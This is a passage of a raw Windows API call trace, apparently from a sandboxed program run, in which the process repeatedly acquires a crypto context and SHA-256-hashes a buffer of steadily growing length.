CryptReleaseContext (hProv=0x338225d0, dwFlags=0x0) returned 1 [0183.703] CryptAcquireContextW (in: phProv=0xcdff0, szContainer=0x0, szProvider=0x0, dwProvType=0x18, dwFlags=0xf0000000 | out: phProv=0xcdff0*=0x338230d0) returned 1 [0183.703] CryptCreateHash (in: hProv=0x338230d0, Algid=0x800c, hKey=0x0, dwFlags=0x0, phHash=0xcdfe0 | out: phHash=0xcdfe0) returned 1 [0183.703] CryptHashData (hHash=0x3396f4a0, pbData=0x32e8a230, dwDataLen=0x80, dwFlags=0x0) returned 1 [0183.703] RtlAllocateHeap (HeapHandle=0x2150000, Flags=0x8, Size=0x20) returned 0x32e82f50 [0183.703] CryptDestroyHash (hHash=0x3396f4a0) returned 1 [0183.703] CryptReleaseContext (hProv=0x338230d0, dwFlags=0x0) returned 1 [0183.703] CryptAcquireContextW (in: phProv=0xcdff0, szContainer=0x0, szProvider=0x0, dwProvType=0x18, dwFlags=0xf0000000 | out: phProv=0xcdff0*=0x338229d0) returned 1 [0183.716] CryptCreateHash (in: hProv=0x338229d0, Algid=0x800c, hKey=0x0, dwFlags=0x0, phHash=0xcdfe0 | out: phHash=0xcdfe0) returned 1 [0183.716] CryptHashData (hHash=0x3396ecc0, pbData=0x32e8a230, dwDataLen=0xa0, dwFlags=0x0) returned 1 [0183.716] RtlAllocateHeap (HeapHandle=0x2150000, Flags=0x8, Size=0x20) returned 0x32e833a0 [0183.716] CryptDestroyHash (hHash=0x3396ecc0) returned 1 [0183.717] CryptReleaseContext (hProv=0x338229d0, dwFlags=0x0) returned 1 [0183.717] CryptAcquireContextW (in: phProv=0xcdff0, szContainer=0x0, szProvider=0x0, dwProvType=0x18, dwFlags=0xf0000000 | out: phProv=0xcdff0*=0x338222d0) returned 1 [0183.717] CryptCreateHash (in: hProv=0x338222d0, Algid=0x800c, hKey=0x0, dwFlags=0x0, phHash=0xcdfe0 | out: phHash=0xcdfe0) returned 1 [0183.717] CryptHashData (hHash=0x3396eb70, pbData=0x32e8a230, dwDataLen=0xc0, dwFlags=0x0) returned 1 [0183.717] RtlAllocateHeap (HeapHandle=0x2150000, Flags=0x8, Size=0x20) returned 0x32e82ec0 [0183.717] CryptDestroyHash (hHash=0x3396eb70) returned 1 [0183.717] CryptReleaseContext (hProv=0x338222d0, dwFlags=0x0) returned 1 [0183.717] CryptAcquireContextW (in: phProv=0xcdff0, szContainer=0x0, szProvider=0x0, dwProvType=0x18, dwFlags=0xf0000000 | out: phProv=0xcdff0*=0x338234d0) returned 1 [0183.718] CryptCreateHash (in: hProv=0x338234d0, Algid=0x800c, hKey=0x0, dwFlags=0x0, phHash=0xcdfe0 | out: phHash=0xcdfe0) returned 1 [0183.718] CryptHashData (hHash=0x3396f4a0, pbData=0x32e8a230, dwDataLen=0xe0, dwFlags=0x0) returned 1 [0183.718] RtlAllocateHeap (HeapHandle=0x2150000, Flags=0x8, Size=0x20) returned 0x32e83100 [0183.718] CryptDestroyHash (hHash=0x3396f4a0) returned 1 [0183.718] CryptReleaseContext (hProv=0x338234d0, dwFlags=0x0) returned 1 [0183.718] CryptAcquireContextW (in: phProv=0xcdff0, szContainer=0x0, szProvider=0x0, dwProvType=0x18, dwFlags=0xf0000000 | out: phProv=0xcdff0*=0x33822fd0) returned 1 [0183.719] CryptCreateHash (in: hProv=0x33822fd0, Algid=0x800c, hKey=0x0, dwFlags=0x0, phHash=0xcdfe0 | out: phHash=0xcdfe0) returned 1 [0183.719] CryptHashData (hHash=0x3396ea20, pbData=0x32e8a230, dwDataLen=0x100, dwFlags=0x0) returned 1 [0183.719] RtlAllocateHeap (HeapHandle=0x2150000, Flags=0x8, Size=0x20) returned 0x32e82fb0 [0183.719] CryptDestroyHash (hHash=0x3396ea20) returned 1 [0183.719] CryptReleaseContext (hProv=0x33822fd0, dwFlags=0x0) returned 1 [0183.719] CryptAcquireContextW (in: phProv=0xcdff0, szContainer=0x0, szProvider=0x0, dwProvType=0x18, dwFlags=0xf0000000 | out: phProv=0xcdff0*=0x338237d0) returned 1 [0183.719] CryptCreateHash (in: hProv=0x338237d0, Algid=0x800c, hKey=0x0, dwFlags=0x0, phHash=0xcdfe0 | out: phHash=0xcdfe0) returned 1 [0183.719] CryptHashData (hHash=0x3396f4a0, pbData=0x32e8a230, dwDataLen=0x120, dwFlags=0x0) returned 1 [0183.719] RtlAllocateHeap (HeapHandle=0x2150000, Flags=0x8, Size=0x20) returned 0x32e83a30 [0183.719] CryptDestroyHash (hHash=0x3396f4a0) returned 1 [0183.719] CryptReleaseContext (hProv=0x338237d0, dwFlags=0x0) returned 1 [0183.719] CryptAcquireContextW (in: phProv=0xcdff0, szContainer=0x0, szProvider=0x0, dwProvType=0x18, dwFlags=0xf0000000 | out: phProv=0xcdff0*=0x33821fd0) returned 1 [0183.720] CryptCreateHash (in: hProv=0x33821fd0, Algid=0x800c, hKey=0x0, dwFlags=0x0, phHash=0xcdfe0 | out: phHash=0xcdfe0) returned 1 [0183.720] CryptHashData (hHash=0x3396eb70, pbData=0x32e8a230, dwDataLen=0x140, dwFlags=0x0) returned 1 [0183.720] RtlAllocateHeap (HeapHandle=0x2150000, Flags=0x8, Size=0x20) returned 0x32e83850 [0183.720] CryptDestroyHash (hHash=0x3396eb70) returned 1 [0183.720] CryptReleaseContext (hProv=0x33821fd0, dwFlags=0x0) returned 1 [0183.720] CryptAcquireContextW (in: phProv=0xcdff0, szContainer=0x0, szProvider=0x0, dwProvType=0x18, dwFlags=0xf0000000 | out: phProv=0xcdff0*=0x33822cd0) returned 1 [0183.720] CryptCreateHash (in: hProv=0x33822cd0, Algid=0x800c, hKey=0x0, dwFlags=0x0, phHash=0xcdfe0 | out: phHash=0xcdfe0) returned 1 [0183.720] CryptHashData (hHash=0x3396ecc0, pbData=0x32e8a230, dwDataLen=0x160, dwFlags=0x0) returned 1 [0183.721] RtlAllocateHeap (HeapHandle=0x2150000, Flags=0x8, Size=0x20) returned 0x32e834c0 [0183.721] CryptDestroyHash (hHash=0x3396ecc0) returned 1 [0183.721] CryptReleaseContext (hProv=0x33822cd0, dwFlags=0x0) returned 1 [0183.721] CryptAcquireContextW (in: phProv=0xcdff0, szContainer=0x0, szProvider=0x0, dwProvType=0x18, dwFlags=0xf0000000 | out: phProv=0xcdff0*=0x33821fd0) returned 1 [0183.721] CryptCreateHash (in: hProv=0x33821fd0, Algid=0x800c, hKey=0x0, dwFlags=0x0, phHash=0xcdfe0 | out: phHash=0xcdfe0) returned 1 [0183.721] CryptHashData (hHash=0x3396ee80, pbData=0x32e8a230, dwDataLen=0x180, dwFlags=0x0) returned 1 [0183.721] RtlAllocateHeap (HeapHandle=0x2150000, Flags=0x8, Size=0x20) returned 0x32e83580 [0183.721] CryptDestroyHash (hHash=0x3396ee80) returned 1 [0183.721] CryptReleaseContext (hProv=0x33821fd0, dwFlags=0x0) returned 1 [0183.721] CryptAcquireContextW (in: phProv=0xcdff0, szContainer=0x0, szProvider=0x0, dwProvType=0x18, dwFlags=0xf0000000 | out: phProv=0xcdff0*=0x338227d0) returned 1 [0183.722] CryptCreateHash (in: hProv=0x338227d0, Algid=0x800c, hKey=0x0, dwFlags=0x0, phHash=0xcdfe0 | out: phHash=0xcdfe0) returned 1 [0183.722] CryptHashData (hHash=0x3396ee10, pbData=0x32e8a230, dwDataLen=0x1a0, dwFlags=0x0) returned 1 [0183.722] RtlAllocateHeap (HeapHandle=0x2150000, Flags=0x8, Size=0x20) returned 0x32e82f80 [0183.722] CryptDestroyHash (hHash=0x3396ee10) returned 1 [0183.722] CryptReleaseContext (hProv=0x338227d0, dwFlags=0x0) returned 1 [0183.722] CryptAcquireContextW (in: phProv=0xcdff0, szContainer=0x0, szProvider=0x0, dwProvType=0x18, dwFlags=0xf0000000 | out: phProv=0xcdff0*=0x33823bd0) returned 1 [0183.722] CryptCreateHash (in: hProv=0x33823bd0, Algid=0x800c, hKey=0x0, dwFlags=0x0, phHash=0xcdfe0 | out: phHash=0xcdfe0) returned 1 [0183.722] CryptHashData (hHash=0x3396f4a0, pbData=0x32e8a230, dwDataLen=0x1c0, dwFlags=0x0) returned 1 [0183.722] RtlAllocateHeap (HeapHandle=0x2150000, Flags=0x8, Size=0x20) returned 0x32e83820 [0183.723] CryptDestroyHash (hHash=0x3396f4a0) returned 1 [0183.723] CryptReleaseContext (hProv=0x33823bd0, dwFlags=0x0) returned 1 [0183.723] CryptAcquireContextW (in: phProv=0xcdff0, szContainer=0x0, szProvider=0x0, dwProvType=0x18, dwFlags=0xf0000000 | out: phProv=0xcdff0*=0x338225d0) returned 1 [0183.723] CryptCreateHash (in: hProv=0x338225d0, Algid=0x800c, hKey=0x0, dwFlags=0x0, phHash=0xcdfe0 | out: phHash=0xcdfe0) returned 1 [0183.723] CryptHashData (hHash=0x3396ea20, pbData=0x32e8a230, dwDataLen=0x1e0, dwFlags=0x0) returned 1 [0183.723] RtlAllocateHeap (HeapHandle=0x2150000, Flags=0x8, Size=0x20) returned 0x32e83610 [0183.723] CryptDestroyHash (hHash=0x3396ea20) returned 1 [0183.723] CryptReleaseContext (hProv=0x338225d0, dwFlags=0x0) returned 1 [0183.723] CryptAcquireContextW (in: phProv=0xcdff0, szContainer=0x0, szProvider=0x0, dwProvType=0x18, dwFlags=0xf0000000 | out: phProv=0xcdff0*=0x338228d0) returned 1 [0183.724] CryptCreateHash (in: hProv=0x338228d0, Algid=0x800c, hKey=0x0, dwFlags=0x0, phHash=0xcdfe0 | out: phHash=0xcdfe0) returned 1 [0183.724] CryptHashData (hHash=0x3396ea20, pbData=0x32e8a230, dwDataLen=0x200, dwFlags=0x0) returned 1 [0183.724] RtlAllocateHeap (HeapHandle=0x2150000, Flags=0x8, Size=0x20) returned 0x32e833d0 [0183.724] CryptDestroyHash (hHash=0x3396ea20) returned 1 [0183.724] CryptReleaseContext (hProv=0x338228d0, dwFlags=0x0) returned 1 [0183.724] CryptAcquireContextW (in: phProv=0xcdff0, szContainer=0x0, szProvider=0x0, dwProvType=0x18, dwFlags=0xf0000000 | out: phProv=0xcdff0*=0x33822ad0) returned 1 [0183.724] CryptCreateHash (in: hProv=0x33822ad0, Algid=0x800c, hKey=0x0, dwFlags=0x0, phHash=0xcdfe0 | out: phHash=0xcdfe0) returned 1 [0183.724] CryptHashData (hHash=0x3396f4a0, pbData=0x32e8a230, dwDataLen=0x220, dwFlags=0x0) returned 1 [0183.725] RtlAllocateHeap (HeapHandle=0x2150000, Flags=0x8, Size=0x20) returned 0x32e834f0 [0183.725] CryptDestroyHash (hHash=0x3396f4a0) returned 1 [0183.725] CryptReleaseContext (hProv=0x33822ad0, dwFlags=0x0) returned 1 [0183.725] CryptAcquireContextW (in: phProv=0xcdff0, szContainer=0x0, szProvider=0x0, dwProvType=0x18, dwFlags=0xf0000000 | out: phProv=0xcdff0*=0x33822ad0) returned 1 [0183.725] CryptCreateHash (in: hProv=0x33822ad0, Algid=0x800c, hKey=0x0, dwFlags=0x0, phHash=0xcdfe0 | out: phHash=0xcdfe0) returned 1 [0183.725] CryptHashData (hHash=0x3396ea20, pbData=0x32e8a230, dwDataLen=0x240, dwFlags=0x0) returned 1 [0183.725] RtlAllocateHeap (HeapHandle=0x2150000, Flags=0x8, Size=0x20) returned 0x32e83550 [0183.725] CryptDestroyHash (hHash=0x3396ea20) returned 1 [0183.725] CryptReleaseContext (hProv=0x33822ad0, dwFlags=0x0) returned 1 [0183.725] CryptAcquireContextW (in: phProv=0xcdff0, szContainer=0x0, szProvider=0x0, dwProvType=0x18, dwFlags=0xf0000000 | out: phProv=0xcdff0*=0x33822ed0) returned 1 [0183.726] CryptCreateHash (in: hProv=0x33822ed0, Algid=0x800c, hKey=0x0, dwFlags=0x0, phHash=0xcdfe0 | out: phHash=0xcdfe0) returned 1 [0183.726] CryptHashData (hHash=0x3396f4a0, pbData=0x32e8a230, dwDataLen=0x260, dwFlags=0x0) returned 1 [0183.726] RtlAllocateHeap (HeapHandle=0x2150000, Flags=0x8, Size=0x20) returned 0x32e83190 [0183.726] CryptDestroyHash (hHash=0x3396f4a0) returned 1 [0183.726] CryptReleaseContext (hProv=0x33822ed0, dwFlags=0x0) returned 1 [0183.726] CryptAcquireContextW (in: phProv=0xcdff0, szContainer=0x0, szProvider=0x0, dwProvType=0x18, dwFlags=0xf0000000 | out: phProv=0xcdff0*=0x33822ed0) returned 1 [0183.726] CryptCreateHash (in: hProv=0x33822ed0, Algid=0x800c, hKey=0x0, dwFlags=0x0, phHash=0xcdfe0 | out: phHash=0xcdfe0) returned 1 [0183.726] CryptHashData (hHash=0x3396f4a0, pbData=0x32e8a230, dwDataLen=0x280, dwFlags=0x0) returned 1 [0183.727] RtlAllocateHeap (HeapHandle=0x2150000, Flags=0x8, Size=0x20) returned 0x32e83400 [0183.727] CryptDestroyHash (hHash=0x3396f4a0) returned 1 [0183.727] CryptReleaseContext (hProv=0x33822ed0, dwFlags=0x0) returned 1 [0183.727] CryptAcquireContextW (in: phProv=0xcdff0, szContainer=0x0, szProvider=0x0, dwProvType=0x18, dwFlags=0xf0000000 | out: phProv=0xcdff0*=0x338220d0) returned 1 [0183.727] CryptCreateHash (in: hProv=0x338220d0, Algid=0x800c, hKey=0x0, dwFlags=0x0, phHash=0xcdfe0 | out: phHash=0xcdfe0) returned 1 [0183.727] CryptHashData (hHash=0x3396f4a0, pbData=0x32e8a230, dwDataLen=0x2a0, dwFlags=0x0) returned 1 [0183.727] RtlAllocateHeap (HeapHandle=0x2150000, Flags=0x8, Size=0x20) returned 0x32e83a90 [0183.727] CryptDestroyHash (hHash=0x3396f4a0) returned 1 [0183.727] CryptReleaseContext (hProv=0x338220d0, dwFlags=0x0) returned 1 [0183.727] CryptAcquireContextW (in: phProv=0xcdff0, szContainer=0x0, szProvider=0x0, dwProvType=0x18, dwFlags=0xf0000000 | out: phProv=0xcdff0*=0x33823ad0) returned 1 [0183.728] CryptCreateHash (in: hProv=0x33823ad0, Algid=0x800c, hKey=0x0, dwFlags=0x0, phHash=0xcdfe0 | out: phHash=0xcdfe0) returned 1 [0183.728] CryptHashData (hHash=0x3396f4a0, pbData=0x32e8a230, dwDataLen=0x2c0, dwFlags=0x0) returned 1 [0183.728] RtlAllocateHeap (HeapHandle=0x2150000, Flags=0x8, Size=0x20) returned 0x32e83010 [0183.728] CryptDestroyHash (hHash=0x3396f4a0) returned 1 [0183.728] CryptReleaseContext (hProv=0x33823ad0, dwFlags=0x0) returned 1 [0183.728] CryptAcquireContextW (in: phProv=0xcdff0, szContainer=0x0, szProvider=0x0, dwProvType=0x18, dwFlags=0xf0000000 | out: phProv=0xcdff0*=0x338220d0) returned 1 [0183.729] CryptCreateHash (in: hProv=0x338220d0, Algid=0x800c, hKey=0x0, dwFlags=0x0, phHash=0xcdfe0 | out: phHash=0xcdfe0) returned 1 [0183.729] CryptHashData (hHash=0x3396f510, pbData=0x32e8a230, dwDataLen=0x2e0, dwFlags=0x0) returned 1 [0183.729] RtlAllocateHeap (HeapHandle=0x2150000, Flags=0x8, Size=0x20) returned 0x32e83520 [0183.729] CryptDestroyHash (hHash=0x3396f510) returned 1 [0183.729] CryptReleaseContext (hProv=0x338220d0, dwFlags=0x0) returned 1 [0183.729] CryptAcquireContextW (in: phProv=0xcdff0, szContainer=0x0, szProvider=0x0, dwProvType=0x18, dwFlags=0xf0000000 | out: phProv=0xcdff0*=0x33822fd0) returned 1 [0183.729] CryptCreateHash (in: hProv=0x33822fd0, Algid=0x800c, hKey=0x0, dwFlags=0x0, phHash=0xcdfe0 | out: phHash=0xcdfe0) returned 1 [0183.729] CryptHashData (hHash=0x3396f4a0, pbData=0x32e8a230, dwDataLen=0x300, dwFlags=0x0) returned 1 [0183.729] RtlAllocateHeap (HeapHandle=0x2150000, Flags=0x8, Size=0x20) returned 0x32e83280 [0183.729] CryptDestroyHash (hHash=0x3396f4a0) returned 1 [0183.729] CryptReleaseContext (hProv=0x33822fd0, dwFlags=0x0) returned 1 [0183.729] CryptAcquireContextW (in: phProv=0xcdff0, szContainer=0x0, szProvider=0x0, dwProvType=0x18, dwFlags=0xf0000000 | out: phProv=0xcdff0*=0x338233d0) returned 1 [0183.730] CryptCreateHash (in: hProv=0x338233d0, Algid=0x800c, hKey=0x0, dwFlags=0x0, phHash=0xcdfe0 | out: phHash=0xcdfe0) returned 1 [0183.730] CryptHashData (hHash=0x3396ee80, pbData=0x32e8a230, dwDataLen=0x320, dwFlags=0x0) returned 1 [0183.730] RtlAllocateHeap (HeapHandle=0x2150000, Flags=0x8, Size=0x20) returned 0x32e82ef0 [0183.730] CryptDestroyHash (hHash=0x3396ee80) returned 1 [0183.730] CryptReleaseContext (hProv=0x338233d0, dwFlags=0x0) returned 1 [0183.730] CryptAcquireContextW (in: phProv=0xcdff0, szContainer=0x0, szProvider=0x0, dwProvType=0x18, dwFlags=0xf0000000 | out: phProv=0xcdff0*=0x338232d0) returned 1 [0183.730] CryptCreateHash (in: hProv=0x338232d0, Algid=0x800c, hKey=0x0, dwFlags=0x0, phHash=0xcdfe0 | out: phHash=0xcdfe0) returned 1 [0183.730] CryptHashData (hHash=0x3396f4a0, pbData=0x32e8a230, dwDataLen=0x340, dwFlags=0x0) returned 1 [0183.731] RtlAllocateHeap (HeapHandle=0x2150000, Flags=0x8, Size=0x20) returned 0x32e83160 [0183.731] CryptDestroyHash (hHash=0x3396f4a0) returned 1 [0183.731] CryptReleaseContext (hProv=0x338232d0, dwFlags=0x0) returned 1 [0183.731] CryptAcquireContextW (in: phProv=0xcdff0, szContainer=0x0, szProvider=0x0, dwProvType=0x18, dwFlags=0xf0000000 | out: phProv=0xcdff0*=0x33822fd0) returned 1 [0183.731] CryptCreateHash (in: hProv=0x33822fd0, Algid=0x800c, hKey=0x0, dwFlags=0x0, phHash=0xcdfe0 | out: phHash=0xcdfe0) returned 1 [0183.731] CryptHashData (hHash=0x3396f4a0, pbData=0x32e8a230, dwDataLen=0x360, dwFlags=0x0) returned 1 [0183.731] RtlAllocateHeap (HeapHandle=0x2150000, Flags=0x8, Size=0x20) returned 0x32e83910 [0183.731] CryptDestroyHash (hHash=0x3396f4a0) returned 1 [0183.731] CryptReleaseContext (hProv=0x33822fd0, dwFlags=0x0) returned 1 [0183.731] CryptAcquireContextW (in: phProv=0xcdff0, szContainer=0x0, szProvider=0x0, dwProvType=0x18, dwFlags=0xf0000000 | out: phProv=0xcdff0*=0x338237d0) returned 1 [0183.732] CryptCreateHash (in: hProv=0x338237d0, Algid=0x800c, hKey=0x0, dwFlags=0x0, phHash=0xcdfe0 | out: phHash=0xcdfe0) returned 1 [0183.732] CryptHashData (hHash=0x3396f4a0, pbData=0x32e8a230, dwDataLen=0x380, dwFlags=0x0) returned 1 [0183.732] RtlAllocateHeap (HeapHandle=0x2150000, Flags=0x8, Size=0x20) returned 0x32e830a0 [0183.732] CryptDestroyHash (hHash=0x3396f4a0) returned 1 [0183.732] CryptReleaseContext (hProv=0x338237d0, dwFlags=0x0) returned 1 [0183.732] CryptAcquireContextW (in: phProv=0xcdff0, szContainer=0x0, szProvider=0x0, dwProvType=0x18, dwFlags=0xf0000000 | out: phProv=0xcdff0*=0x338225d0) returned 1 [0183.732] CryptCreateHash (in: hProv=0x338225d0, Algid=0x800c, hKey=0x0, dwFlags=0x0, phHash=0xcdfe0 | out: phHash=0xcdfe0) returned 1 [0183.732] CryptHashData (hHash=0x3396ea20, pbData=0x32e8a230, dwDataLen=0x3a0, dwFlags=0x0) returned 1 [0183.733] RtlAllocateHeap (HeapHandle=0x2150000, Flags=0x8, Size=0x20) returned 0x32e83640 [0183.733] CryptDestroyHash (hHash=0x3396ea20) returned 1 [0183.733] CryptReleaseContext (hProv=0x338225d0, dwFlags=0x0) returned 1 [0183.733] CryptAcquireContextW (in: phProv=0xcdff0, szContainer=0x0, szProvider=0x0, dwProvType=0x18, dwFlags=0xf0000000 | out: phProv=0xcdff0*=0x338238d0) returned 1 [0183.742] CryptCreateHash (in: hProv=0x338238d0, Algid=0x800c, hKey=0x0, dwFlags=0x0, phHash=0xcdfe0 | out: phHash=0xcdfe0) returned 1 [0183.742] CryptHashData (hHash=0x3396eb70, pbData=0x32e8a230, dwDataLen=0x3c0, dwFlags=0x0) returned 1 [0183.742] RtlAllocateHeap (HeapHandle=0x2150000, Flags=0x8, Size=0x20) returned 0x32e836a0 [0183.742] CryptDestroyHash (hHash=0x3396eb70) returned 1 [0183.742] CryptReleaseContext (hProv=0x338238d0, dwFlags=0x0) returned 1 [0183.742] CryptAcquireContextW (in: phProv=0xcdff0, szContainer=0x0, szProvider=0x0, dwProvType=0x18, dwFlags=0xf0000000 | out: phProv=0xcdff0*=0x338239d0) returned 1 [0183.743] CryptCreateHash (in: hProv=0x338239d0, Algid=0x800c, hKey=0x0, dwFlags=0x0, phHash=0xcdfe0 | out: phHash=0xcdfe0) returned 1 [0183.743] CryptHashData (hHash=0x3396eb70, pbData=0x32e8a230, dwDataLen=0x3e0, dwFlags=0x0) returned 1 [0183.743] RtlAllocateHeap (HeapHandle=0x2150000, Flags=0x8, Size=0x20) returned 0x32e83040 [0183.743] CryptDestroyHash (hHash=0x3396eb70) returned 1 [0183.743] CryptReleaseContext (hProv=0x338239d0, dwFlags=0x0) returned 1 [0183.743] CryptAcquireContextW (in: phProv=0xcdff0, szContainer=0x0, szProvider=0x0, dwProvType=0x18, dwFlags=0xf0000000 | out: phProv=0xcdff0*=0x338239d0) returned 1 [0183.744] CryptCreateHash (in: hProv=0x338239d0, Algid=0x800c, hKey=0x0, dwFlags=0x0, phHash=0xcdfe0 | out: phHash=0xcdfe0) returned 1 [0183.744] CryptHashData (hHash=0x3396ea20, pbData=0x32e8a230, dwDataLen=0x400, dwFlags=0x0) returned 1 [0183.744] RtlAllocateHeap (HeapHandle=0x2150000, Flags=0x8, Size=0x20) returned 0x32e82f20 [0183.744] CryptDestroyHash (hHash=0x3396ea20) returned 1 [0183.744] CryptReleaseContext (hProv=0x338239d0, dwFlags=0x0) returned 1 [0183.744] CryptAcquireContextW (in: phProv=0xcdff0, szContainer=0x0, szProvider=0x0, dwProvType=0x18, dwFlags=0xf0000000 | out: phProv=0xcdff0*=0x338232d0) returned 1 [0183.744] CryptCreateHash (in: hProv=0x338232d0, Algid=0x800c, hKey=0x0, dwFlags=0x0, phHash=0xcdfe0 | out: phHash=0xcdfe0) returned 1 [0183.744] CryptHashData (hHash=0x3396ea20, pbData=0x32e8a230, dwDataLen=0x420, dwFlags=0x0) returned 1 [0183.744] RtlAllocateHeap (HeapHandle=0x2150000, Flags=0x8, Size=0x20) returned 0x32e836d0 [0183.744] CryptDestroyHash (hHash=0x3396ea20) returned 1 [0183.744] CryptReleaseContext (hProv=0x338232d0, dwFlags=0x0) returned 1 [0183.744] CryptAcquireContextW (in: phProv=0xcdff0, szContainer=0x0, szProvider=0x0, dwProvType=0x18, dwFlags=0xf0000000 | out: phProv=0xcdff0*=0x338227d0) returned 1 [0183.745] CryptCreateHash (in: hProv=0x338227d0, Algid=0x800c, hKey=0x0, dwFlags=0x0, phHash=0xcdfe0 | out: phHash=0xcdfe0) returned 1 [0183.745] CryptHashData (hHash=0x3396f4a0, pbData=0x32e8a230, dwDataLen=0x440, dwFlags=0x0) returned 1 [0183.745] RtlAllocateHeap (HeapHandle=0x2150000, Flags=0x8, Size=0x20) returned 0x32e83430 [0183.745] CryptDestroyHash (hHash=0x3396f4a0) returned 1 [0183.745] CryptReleaseContext (hProv=0x338227d0, dwFlags=0x0) returned 1 [0183.745] CryptAcquireContextW (in: phProv=0xcdff0, szContainer=0x0, szProvider=0x0, dwProvType=0x18, dwFlags=0xf0000000 | out: phProv=0xcdff0*=0x338234d0) returned 1 [0183.746] CryptCreateHash (in: hProv=0x338234d0, Algid=0x800c, hKey=0x0, dwFlags=0x0, phHash=0xcdfe0 | out: phHash=0xcdfe0) returned 1 [0183.746] CryptHashData (hHash=0x3396ea20, pbData=0x32e8a230, dwDataLen=0x460, dwFlags=0x0) returned 1 [0183.746] RtlAllocateHeap (HeapHandle=0x2150000, Flags=0x8, Size=0x20) returned 0x32e830d0 [0183.746] CryptDestroyHash (hHash=0x3396ea20) returned 1 [0183.746] CryptReleaseContext (hProv=0x338234d0, dwFlags=0x0) returned 1 [0183.746] CryptAcquireContextW (in: phProv=0xcdff0, szContainer=0x0, szProvider=0x0, dwProvType=0x18, dwFlags=0xf0000000 | out: phProv=0xcdff0*=0x338230d0) returned 1 [0183.746] CryptCreateHash (in: hProv=0x338230d0, Algid=0x800c, hKey=0x0, dwFlags=0x0, phHash=0xcdfe0 | out: phHash=0xcdfe0) returned 1 [0183.746] CryptHashData (hHash=0x3396f5f0, pbData=0x32e8a230, dwDataLen=0x480, dwFlags=0x0) returned 1 [0183.746] RtlAllocateHeap (HeapHandle=0x2150000, Flags=0x8, Size=0x20) returned 0x32e83700 [0183.746] CryptDestroyHash (hHash=0x3396f5f0) returned 1 [0183.746] CryptReleaseContext (hProv=0x338230d0, dwFlags=0x0) returned 1 [0183.746] CryptAcquireContextW (in: phProv=0xcdff0, szContainer=0x0, szProvider=0x0, dwProvType=0x18, dwFlags=0xf0000000 | out: phProv=0xcdff0*=0x338234d0) returned 1 [0183.747] CryptCreateHash (in: hProv=0x338234d0, Algid=0x800c, hKey=0x0, dwFlags=0x0, phHash=0xcdfe0 | out: phHash=0xcdfe0) returned 1 [0183.747] CryptHashData (hHash=0x3396f4a0, pbData=0x32e8a230, dwDataLen=0x4a0, dwFlags=0x0) returned 1 [0183.747] RtlAllocateHeap (HeapHandle=0x2150000, Flags=0x8, Size=0x20) returned 0x32e832e0 [0183.747] CryptDestroyHash (hHash=0x3396f4a0) returned 1 [0183.747] CryptReleaseContext (hProv=0x338234d0, dwFlags=0x0) returned 1 [0183.747] CryptAcquireContextW (in: phProv=0xcdff0, szContainer=0x0, szProvider=0x0, dwProvType=0x18, dwFlags=0xf0000000 | out: phProv=0xcdff0*=0x338233d0) returned 1 [0183.748] CryptCreateHash (in: hProv=0x338233d0, Algid=0x800c, hKey=0x0, dwFlags=0x0, phHash=0xcdfe0 | out: phHash=0xcdfe0) returned 1 [0183.748] CryptHashData (hHash=0x3396ee10, pbData=0x32e8a230, dwDataLen=0x4c0, dwFlags=0x0) returned 1 [0183.748] RtlAllocateHeap (HeapHandle=0x2150000, Flags=0x8, Size=0x20) returned 0x32e83880 [0183.748] CryptDestroyHash (hHash=0x3396ee10) returned 1 [0183.748] CryptReleaseContext (hProv=0x338233d0, dwFlags=0x0) returned 1 [0183.748] CryptAcquireContextW (in: phProv=0xcdff0, szContainer=0x0, szProvider=0x0, dwProvType=0x18, dwFlags=0xf0000000 | out: phProv=0xcdff0*=0x33823bd0) returned 1 [0183.748] CryptCreateHash (in: hProv=0x33823bd0, Algid=0x800c, hKey=0x0, dwFlags=0x0, phHash=0xcdfe0 | out: phHash=0xcdfe0) returned 1 [0183.748] CryptHashData (hHash=0x3396f660, pbData=0x32e8a230, dwDataLen=0x4e0, dwFlags=0x0) returned 1 [0183.748] RtlAllocateHeap (HeapHandle=0x2150000, Flags=0x8, Size=0x20) returned 0x32e83370 [0183.749] CryptDestroyHash (hHash=0x3396f660) returned 1 [0183.749] CryptReleaseContext (hProv=0x33823bd0, dwFlags=0x0) returned 1 [0183.749] CryptAcquireContextW (in: phProv=0xcdff0, szContainer=0x0, szProvider=0x0, dwProvType=0x18, dwFlags=0xf0000000 | out: phProv=0xcdff0*=0x338236d0) returned 1 [0183.749] CryptCreateHash (in: hProv=0x338236d0, Algid=0x800c, hKey=0x0, dwFlags=0x0, phHash=0xcdfe0 | out: phHash=0xcdfe0) returned 1 [0183.749] CryptHashData (hHash=0x3396ecc0, pbData=0x32e8a230, dwDataLen=0x500, dwFlags=0x0) returned 1 [0183.749] RtlAllocateHeap (HeapHandle=0x2150000, Flags=0x8, Size=0x20) returned 0x32e835b0 [0183.749] CryptDestroyHash (hHash=0x3396ecc0) returned 1 [0183.749] CryptReleaseContext (hProv=0x338236d0, dwFlags=0x0) returned 1 [0183.749] CryptAcquireContextW (in: phProv=0xcdff0, szContainer=0x0, szProvider=0x0, dwProvType=0x18, dwFlags=0xf0000000 | out: phProv=0xcdff0*=0x33822bd0) returned 1 [0183.750] CryptCreateHash (in: hProv=0x33822bd0, Algid=0x800c, hKey=0x0, dwFlags=0x0, phHash=0xcdfe0 | out: phHash=0xcdfe0) returned 1 [0183.750] CryptHashData (hHash=0x3396f4a0, pbData=0x32e8a230, dwDataLen=0x520, dwFlags=0x0) returned 1 [0183.750] RtlAllocateHeap (HeapHandle=0x2150000, Flags=0x8, Size=0x20) returned 0x32e831c0 [0183.750] CryptDestroyHash (hHash=0x3396f4a0) returned 1 [0183.750] CryptReleaseContext (hProv=0x33822bd0, dwFlags=0x0) returned 1 [0183.750] CryptAcquireContextW (in: phProv=0xcdff0, szContainer=0x0, szProvider=0x0, dwProvType=0x18, dwFlags=0xf0000000 | out: phProv=0xcdff0*=0x338235d0) returned 1 [0183.750] CryptCreateHash (in: hProv=0x338235d0, Algid=0x800c, hKey=0x0, dwFlags=0x0, phHash=0xcdfe0 | out: phHash=0xcdfe0) returned 1 [0183.751] CryptHashData (hHash=0x3396ee10, pbData=0x32e8a230, dwDataLen=0x540, dwFlags=0x0) returned 1 [0183.751] RtlAllocateHeap (HeapHandle=0x2150000, Flags=0x8, Size=0x20) returned 0x32e83070 [0183.751] CryptDestroyHash (hHash=0x3396ee10) returned 1 [0183.751] CryptReleaseContext (hProv=0x338235d0, dwFlags=0x0) returned 1 [0183.751] CryptAcquireContextW (in: phProv=0xcdff0, szContainer=0x0, szProvider=0x0, dwProvType=0x18, dwFlags=0xf0000000 | out: phProv=0xcdff0*=0x33822cd0) 